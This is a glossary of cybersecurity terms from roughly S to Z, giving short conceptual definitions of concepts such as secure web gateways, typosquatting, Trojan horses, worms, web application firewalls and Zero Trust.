A Secure Web Gateway (SWG) is a security solution that protects users from web-based threats by filtering internet traffic, enforcing corporate policies, blocking malicious websites, and preventing data exfiltration through web channels.

Sarbanes-Oxley Act (SOX) compliance requires publicly traded companies to implement and maintain adequate internal controls over financial reporting, including IT general controls that protect financial systems and data integrity.

Service Mesh Security refers to the protection of inter-service communications within microservices architectures through mutual TLS, fine-grained access policies, traffic encryption, and observability provided by service mesh platforms like Istio and Linkerd.

Security Posture refers to an organization's overall cybersecurity strength and readiness, encompassing the status of its security controls, policies, compliance adherence, vulnerability exposure, and ability to prevent, detect, and respond to threats.

A Security Control Framework is a structured set of security controls, guidelines, and best practices that organizations use to design, implement, assess, and improve their security program, such as NIST SP 800-53, CIS Controls, or COBIT.

Shoulder Surfing is a social engineering technique where an attacker observes a victim's screen or keyboard to gather sensitive information such as passwords, PINs, or confidential data in public or semi-public spaces.

Surveillance Detection is the practice of identifying whether an individual, facility, or operation is being monitored by hostile entities, forming a critical component of executive protection and corporate counterintelligence programs.

A Service Account is a non-human identity used by applications, services, or automated processes to authenticate and access resources, often with elevated privileges that make them attractive targets for attackers.

Security Operations Metrics are quantitative measurements used to evaluate the effectiveness, efficiency, and maturity of a security operations program, including detection accuracy, response times, and control coverage.

Security Logging is the practice of collecting, storing, and analyzing event records from systems, applications, and networks to detect security incidents, support investigations, and demonstrate compliance.

Threat intelligence is evidence-based knowledge about existing or emerging threats to an organization's security. It includes context, indicators of compromise (IOCs), and actionable insights that help organizations understand, prevent, and respond to cyber threats.

Typosquatting is a social engineering attack that registers domain names similar to popular websites, exploiting common typing errors to redirect users to malicious sites for phishing, malware distribution, or ad fraud.

A Trojan Horse is malware disguised as legitimate software that tricks users into installing it, then provides attackers with unauthorized access to the victim's system for data theft, surveillance, or further attacks.

Third-Party Risk refers to the potential threats and vulnerabilities introduced to an organization through its relationships with external vendors, partners, contractors, and service providers who access its systems or data.

TLS (Transport Layer Security) and its predecessor SSL (Secure Sockets Layer) are cryptographic protocols that provide secure, encrypted communication over networks, most commonly used to protect web traffic via HTTPS.

Tokenization is a data protection technique that replaces sensitive data elements with non-sensitive placeholder tokens, while the original data is stored securely in a separate token vault with restricted access.

Threat Hunting is the proactive practice of searching through networks, endpoints, and datasets to detect and isolate advanced threats that evade existing automated security solutions.

A Tabletop Exercise is a discussion-based simulation where key stakeholders walk through a hypothetical security incident scenario to evaluate their response plans, identify gaps, and improve coordination without executing actual operations.

Threat Modeling is a structured approach for identifying, quantifying, and addressing security threats to a system by analyzing its architecture, data flows, and trust boundaries to proactively design security controls.

Tailgating is a physical security breach where an unauthorized person follows an authorized individual into a restricted area without presenting their own credentials, exploiting social courtesy to bypass access controls.

A vulnerability assessment is a systematic process of identifying, quantifying, and prioritizing security vulnerabilities in systems, networks, and applications. It uses automated scanning tools and manual analysis to discover weaknesses that could be exploited by attackers.

A Virtual Private Network (VPN) creates an encrypted tunnel between a user's device and a remote server, protecting data in transit from eavesdropping. VPNs are used to secure remote access to corporate networks and to maintain privacy on public networks.

A Computer Virus is malicious code that attaches itself to legitimate programs or files and replicates when the infected program is executed, spreading to other files and systems while delivering harmful payloads.

Vendor Risk Management is the process of assessing, monitoring, and mitigating security risks posed by third-party vendors, suppliers, and service providers who have access to an organization's data or systems.

Vulnerability Management is the continuous process of identifying, classifying, prioritizing, remediating, and mitigating security vulnerabilities across an organization's IT infrastructure and applications.

A Virtual CISO (vCISO) is an outsourced security leadership service that provides organizations with experienced chief information security officer expertise on a fractional or part-time basis without the cost of a full-time executive.

A Watering Hole Attack compromises websites frequently visited by a specific target group, injecting malicious code that infects visitors' systems when they browse the compromised site.

A Worm is self-replicating malware that spreads automatically across networks without requiring user interaction, exploiting vulnerabilities in operating systems or applications to propagate and deliver payloads.

A Web Application Firewall (WAF) is a security solution that monitors, filters, and blocks HTTP/HTTPS traffic to and from web applications, protecting against attacks like SQL injection, XSS, and other OWASP Top 10 vulnerabilities.

Wireless Security encompasses the measures and protocols used to protect wireless networks and connected devices from unauthorized access, eavesdropping, and attacks that exploit vulnerabilities in Wi-Fi and other wireless technologies.

Extended Detection and Response (XDR) is a security platform that integrates and correlates data from multiple security tools across endpoints, networks, cloud, and email to provide unified threat detection, investigation, and automated response.

Zero Trust is a security framework that requires all users, devices, and applications to be verified, authenticated, and continuously validated before being granted access to resources, regardless of whether they are inside or outside the network perimeter.

Zero Trust Network Access (ZTNA) is a security framework that provides secure remote access to applications on a per-session basis, verifying user identity, device health, and context before granting access without exposing the network.